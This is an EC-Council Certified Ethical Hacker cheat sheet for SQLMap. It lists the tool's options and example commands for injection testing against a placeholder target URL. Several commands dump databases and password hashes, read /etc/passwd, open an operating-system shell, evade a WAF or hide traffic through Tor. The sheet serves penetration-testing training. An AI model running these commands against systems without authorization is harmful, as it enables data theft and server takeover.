
Ethical Hacking and Countermeasures

Certified Ethical Hacker


SQLMap Cheat Sheet

SQLMap
SQLMap is an open-source penetration testing tool for detecting and exploiting SQL injection flaws and taking over database servers. It includes many features such as database fingerprinting, fetching data from the database, accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Source: http://sqlmap.org, https://github.com

SQLMap Options

Syntax: python sqlmap [options]

Syntax                       Options
-u URL or --url=URL          Target URL
-g GOOGLEDORK                Process Google dork results as target URLs
--data=DATA                  Send data string through POST
--cookie=COOKIE              HTTP cookie header value
--random-agent               Use randomly selected HTTP User-Agent header value
--proxy=PROXY                Use a proxy to connect to the target URL
--tor                        Use Tor anonymity network
--check-tor                  Verify if Tor is used properly
--level=LEVEL                Specify the level of tests to perform (1-5, default 1)
--risk=RISK                  Specify the risk of tests to perform (1-3, default 1)
--technique=TECH             Specify SQL injection techniques to use (default "BEUSTQ")
-a or --all                  Retrieve everything
-b or --banner               Retrieve DBMS banner
--current-user               Retrieve DBMS current user
--current-db                 Retrieve DBMS current database
--passwords                  Enumerate DBMS users' password hashes
--tables                     Enumerate DBMS database tables
--columns                    Enumerate DBMS database table columns
--schema                     Enumerate DBMS schema
--dump                       Dump DBMS database table entries
--dump-all                   Dump all DBMS databases tables entries
-D DB                        DBMS database to enumerate
-T TBL                       DBMS database table(s) to enumerate
-C COL                       DBMS database table column(s) to enumerate
--os-shell                   Prompt for an interactive operating system shell
--os-pwn                     Prompt for an OOB shell, Meterpreter or VNC
--batch                      Do not ask for user input, use the default behavior
--flush-session              Flush session files for the current target
--sqlmap-shell               Prompt for an interactive sqlmap shell
--wizard                     Simple wizard interface for beginner users
-d DIRECT                    Specify connection string for direct database connection
-l LOGFILE                   Parse target(s) from Burp or WebScarab proxy log file
-m BULKFILE                  Scan multiple targets given in a textual file
-r REQUESTFILE               Load HTTP request from a file
-c CONFIGFILE                Load options from a configuration INI file
--method=METHOD              Force usage of the given HTTP method
--param-del=PARA..           Specify character used for splitting parameter values
--cookie-del=COO..           Specify character used for splitting cookie values
--load-cookies=L..           Specify a file containing cookies in Netscape/wget format
--drop-set-cookie            Ignore Set-Cookie header from the response
--user-agent=AGENT           Specify HTTP User-Agent header value
--host=HOST                  Specify HTTP Host header value
--referer=REFERER            Specify HTTP Referer header value
-H HEADER or --hea..         Specify extra header
--headers=HEADERS            Specify extra headers
--auth-type=AUTH..           Specify HTTP authentication type
--auth-cred=AUTH..           Specify HTTP authentication credentials
--auth-file=AUTH..           Specify HTTP authentication PEM cert/private key file
--ignore-code=IG..           Ignore (problematic) HTTP error code (e.g. 401)
--ignore-proxy               Ignore system default proxy settings
--ignore-redirects           Ignore redirection attempts
--ignore-timeouts            Ignore connection timeouts
--proxy-cred=PRO..           Specify proxy authentication credentials
--proxy-file=PRO..           Load proxy list from a file
--tor-port=TORPORT           Set Tor proxy port other than the default
--tor-type=TORTYPE           Set Tor proxy type
--delay=DELAY                Delay in seconds between each HTTP request
--timeout=TIMEOUT            Seconds to wait before timeout connection
--retries=RETRIES            Retries when the connection timeouts
--randomize=RPARAM           Randomly change the value for a given parameter(s)
--safe-url=SAFEURL           The URL address to visit frequently during testing
--safe-post=SAFE..           POST data to send to a safe URL
--safe-req=SAFER..           Load safe HTTP request from a file
--safe-freq=SAFE..           Specify test requests between two visits to a given safe URL
--skip-urlencode             Skip URL encoding of payload data
--csrf-token=CSR..           Specify parameter used to hold the anti-CSRF token
--csrf-url=CSRFURL           Specify URL address to visit for extraction of anti-CSRF token
--force-ssl                  Force usage of SSL/HTTPS
--hpp                        Use HTTP parameter pollution method
--eval=EVALCODE              Evaluate provided Python code before the request
-o                           Turn on all optimization switches
--predict-output             Predict common queries output
--keep-alive                 Use persistent HTTP(s) connections
--null-connection            Retrieve page length without the actual HTTP response body
--threads=THREADS            Specify max number of concurrent HTTP(s) requests (default 1)

www.eccouncil.org/ceh Over 50% Of Professionals Received Promotions after C|EH



Syntax                       Options
-p TESTPARAMETER             Specify testable parameter(s)
--skip=SKIP                  Skip testing for a given parameter(s)
--skip-static                Skip testing parameters that do not appear to be dynamic
--param-exclude=..           Specify regexp to exclude parameters from testing
--dbms=DBMS                  Force back-end DBMS to the provided value
--dbms-cred=DBMS..           Specify DBMS authentication credentials
--os=OS                      Force back-end DBMS operating system to the provided value
--invalid-bignum             Use big numbers for invalidating values
--invalid-logical            Use logical operations for invalidating values
--invalid-string             Use random strings for invalidating values
--no-cast                    Turn off payload casting mechanism
--no-escape                  Turn off string escaping mechanism
--prefix=PREFIX              Injection payload prefix string
--suffix=SUFFIX              Injection payload suffix string
--tamper=TAMPER              Use given script(s) for tampering injection data
--string=STRING              Specify the string to match when the query is evaluated to True
--not-string=NOT..           Specify the string to match when the query is evaluated to False
--regexp=REGEXP              Specify regexp to match when the query is evaluated to True
--code=CODE                  Specify HTTP code to match when the query is evaluated to True
--text-only                  Compare pages based only on the textual content
--titles                     Compare pages based only on their titles
--time-sec=TIMESEC           Specify seconds to delay the DBMS response
--union-cols=UCOLS           Specify a range of columns to test for UNION query SQL injection
--union-char=UCHAR           Specify character to use for brute-forcing number of columns
--union-from=UFROM           Specify table to use in FROM part of UNION query SQL injection
--dns-domain=DNS..           Specify domain name used for DNS exfiltration attack
--second-url=SEC..           Resulting page URL searched for a second-order response
--second-req=SEC..           Load second-order HTTP request from the file
-f or --fingerprint          Perform an extensive DBMS version fingerprint
--hostname                   Retrieve DBMS server hostname
--is-dba                     Detect if the DBMS current user is DBA
--users                      Enumerate DBMS users
--privileges                 Enumerate DBMS users' privileges
--roles                      Enumerate DBMS users' roles
--dbs                        Enumerate DBMS databases
--count                      Retrieve the number of entries for the table(s)
--search                     Search column(s), table(s) and/or database name(s)
--comments                   Check for DBMS comments during enumeration
-X EXCLUDE                   DBMS database identifier(s) to not enumerate
-U USER                      DBMS user to enumerate
--exclude-sysdbs             Exclude DBMS system databases when enumerating tables
--pivot-column=P..           Pivot column name
--where=DUMPWHERE            Use WHERE condition while table dumping
--start=LIMITSTART           First dump table entry to retrieve
--stop=LIMITSTOP             Last dump table entry to retrieve
--first=FIRSTCHAR            First query output word character to retrieve
--last=LASTCHAR              Last query output word character to retrieve
--sql-query=QUERY            Specify SQL statement to be executed
--sql-shell                  Prompt for an interactive SQL shell
--sql-file=SQLFILE           Execute SQL statements from a given file(s)
--common-tables              Verify the existence of common tables
--common-columns             Verify the existence of common columns
--udf-inject                 Inject custom user-defined functions
--shared-lib=SHLIB           Local path of the shared library
--file-read=FILE..           Read a file from the back-end DBMS file system
--file-write=FIL..           Write a local file on the back-end DBMS file system
--file-dest=FILE..           Back-end DBMS absolute file path to write to
--os-cmd=OSCMD               Execute an operating system command
--os-smbrelay                One-click prompt for an OOB shell, Meterpreter or VNC
--os-bof                     Stored procedure buffer overflow exploitation
--priv-esc                   Database process user privilege escalation
--msf-path=MSFPATH           The local path where Metasploit Framework is installed
--tmp-path=TMPPATH           The remote absolute path of temporary files directory
--reg-read                   Read a Windows registry key value
--reg-add                    Write a Windows registry key value data
--reg-del                    Delete a Windows registry key value
--reg-key=REGKEY             Windows registry key
--reg-value=REGVAL           Windows registry key value
--reg-data=REGDATA           Windows registry key value data
--reg-type=REGTYPE           Windows registry key value type
-s SESSIONFILE               Load session from a stored (.sqlite) file
-t TRAFFICFILE               Log all HTTP traffic into a textual file
--binary-fields=..           Specify result fields having binary values
--check-internet             Verify Internet connection before assessing the target
--crawl=CRAWLDEPTH           Crawl the website starting from the target URL
--crawl-exclude=..           Specify regexp to exclude pages from crawling
--csv-del=CSVDEL             Specify delimiting character used in CSV output
--charset=CHARSET            Specify blind SQL injection charset
--dump-format=DU..           Specify format of dumped data
--encoding=ENCOD..           Specify character encoding used for data retrieval
--eta                        Display for each output the estimated time of arrival
--forms                      Parse and test forms on target URL
--fresh-queries              Ignore query results stored in the session file
--har=HARFILE                Log all HTTP traffic into a HAR file
--hex                        Use hex conversion during data retrieval

SQLMap Commands

Command, followed by its description:

sqlmap -u <Target URL> -p id
    Scans a GET request

sqlmap -u <Target URL> --data="user=admin&password=admin" -p user
    Scans a POST request

sqlmap -u <Target URL> --cookie="cookie value"
    Scans POST login pages

sqlmap -u <Target URL> --crawl=1
    Defines a depth to crawl

sqlmap -u <Target URL> -p id --proxy="http://localhost:8080"
    SQLMap through a proxy

sqlmap -u <Target URL> --crawl=3 --batch
    The batch option uses the default value to proceed without asking the user

sqlmap -u <Target URL> --forms
    The forms option parses the page and guides the user to test the identified fields

sqlmap -u <Target URL> --dbs --threads=5
    The threads option defines the number of concurrent requests to be sent by the SQLMap tool

sqlmap -u <Target URL> -v 3
    Verbose, to see the payload being sent by the tool

sqlmap -u <Target URL> --dbs
    Database enumeration

python sqlmap -u <Target URL> --tamper=apostrophemask,apostrophenullencode
    To bypass a WAF

sqlmap -u <Target URL> --os-shell
    Run system commands on a Linux server

sqlmap -u <Target URL> --os-cmd <cmd>
    Run system commands on a Windows server

sqlmap -u <Target URL> --sql-shell
    Run SQL queries

sqlmap -u <Target URL> --auth-type Basic --auth-cred "admin:admin"
    Scans a page protected by HTTP authentication like Basic, NTLM, and Digest

sqlmap -u <Target URL> --auth-file=<path to PEM certificate or private key file>
    Scans a page protected by key-based authentication

sqlmap -u <Target URL> --tor
    To use the default Tor anonymity network

sqlmap -u <Target URL> --tor-port=<tor proxy port>
    To define a Tor port

sqlmap -u <Target URL> --delay=1    # 1 second delay
    If a delay is required between each HTTP request

sqlmap -u <Target URL> --csrf-token=<csrf token>
    Including the CSRF token in the command

sqlmap -r /root/Desktop/Burp.txt --second-url "<Target URL>"
    Second-order SQL injection

python sqlmap.py -u <Target URL> --is-dba -v 1
    Checks whether the current user is DBA

python sqlmap.py -u <Target URL> --users -v 0
    List the database management system users

python sqlmap.py -u <Target URL> --passwords -v 0
or
python sqlmap.py -u <Target URL> --passwords -U sa -v 0
    Database user passwords

python sqlmap.py -u <Target URL> --privileges -v 0
or
python sqlmap.py -u <Target URL> --privileges -U postgres -v 0
    To view the user permissions

python sqlmap.py -u <Target URL> --dbs -v 0
    dbs: list the available databases

python sqlmap.py -u <Target URL> --tables -D "information_schema"
    List the tables in a database

python sqlmap.py -u <Target URL> --columns -T "user" -D "mysql" -v 1
    List the column names of a table

python sqlmap.py -u <Target URL> --dump -T "users" -D "testdb"
    Dump the contents of the specified table

python sqlmap.py -u <Target URL> --dump-all -v 0
    dump-all: list all databases and all table contents

python sqlmap.py -u <Target URL> --file-read=/etc/passwd
    Read the contents of a file on the server [load_file() function]

python sqlmap.py -u <Target URL> --sql-shell
    Execute SQL

python sqlmap.py -u <Target URL> --method POST --data "id=1"
    POST submission

python sqlmap.py -u <Target URL> --cookie "id=1" -v 1
    Cookie submission

python sqlmap.py -u <Target URL> --referer "url" -v 3
    Forge the Referer header

python sqlmap.py -u <Target URL> --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3
or
python sqlmap.py -u <Target URL> -v 1 -a "./txt/user-agents.txt"
    Using a custom User-Agent or user-agents.txt

python sqlmap.py -u <Target URL> -v 1 --current-user --threads 3
    Use multithreading for the guessing

python sqlmap.py -u <Target URL> -v 2 --dbms "PostgreSQL"
    Specify the database, bypassing SQLMap's automatic detection

python sqlmap.py -u <Target URL> -v 2 --os "Windows"
    Specify the operating system, bypassing SQLMap's automatic detection

python sqlmap.py -u <Target URL> -v 3 -p "id" --prefix "'" --suffix "and 'test'='test"
    Prefix and suffix custom payload

python sqlmap.py -u <Target URL> --union-test -v 1
    Union injection test

python sqlmap.py -u <Target URL> --union-test --union-tech orderby -v 1
    With the ORDER BY technique

python sqlmap -u "<Target URL>" --cookie= --data=
    Passing cookie and POST data directly into SQLMap

python sqlmap -u "<Target URL>" --risk=3 --level=5
    Increase the risk and level values
